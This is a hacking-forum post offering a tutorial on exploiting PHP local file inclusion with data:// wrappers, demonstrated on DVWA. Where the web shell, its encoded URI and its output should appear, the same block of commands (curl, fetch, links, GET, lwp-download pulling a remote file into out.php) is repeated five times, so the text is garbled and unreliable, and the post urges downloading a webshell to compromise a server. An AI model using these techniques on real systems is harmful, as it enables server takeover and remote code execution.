Jump to content
Sign in to follow this  
Omega

Using Data wrappers in LFi

Recommended Posts

Omega

Hello guys Lfis can be exploited by php://input , php://filter, including sensitive files and so many other techniques. So I taught of writing a small tutorial on exploiting LFi using data:// wrappers.

The data URIs are used in web development to load images and other elements in a single HTTP request other than using a multiple HTTP headers. By using data URIs we can perform many attacks including phishing attacks and so many new techniques can be used.

To use data:// wrappers in Lfi these are the conditions:

allow_url_include = On

php version should be higher than 5.2

I will demostrate this attack on DVWA on my localhost. So I will use a simple web shell



curl http://site.com -o out.php

fetch http://site.com -o out.php

links -source http://shell > out.php

GET http://site.com > out.php

lwp-download http://site

Lets convert this to a URI.



curl http://site.com -o out.php

fetch http://site.com -o out.php

links -source http://shell > out.php

GET http://site.com > out.php

lwp-download http://site

or



curl http://site.com -o out.php

fetch http://site.com -o out.php

links -source http://shell > out.php

GET http://site.com > out.php

lwp-download http://site

I will include this data URI and this the output:



curl http://site.com -o out.php

fetch http://site.com -o out.php

links -source http://shell > out.php

GET http://site.com > out.php

lwp-download http://site

4TNrM.png

0TYxs.jpg

You can use wget to download a webshell and compromise the server smile.gif

Well, other methods that can be used to download a shell are:



curl http://site.com -o out.php

fetch http://site.com -o out.php

links -source http://shell > out.php

GET http://site.com > out.php

lwp-download http://site

To generate your own custom data URI payload use this site http://dopiaza.org/t...tauri/index.php

Thank you for reading this hope you got something dry.gif

-Un0wn_X

Share this post


Link to post

Please sign in to comment

You will be able to leave a comment after signing in



Sign In Now
Sign in to follow this  
×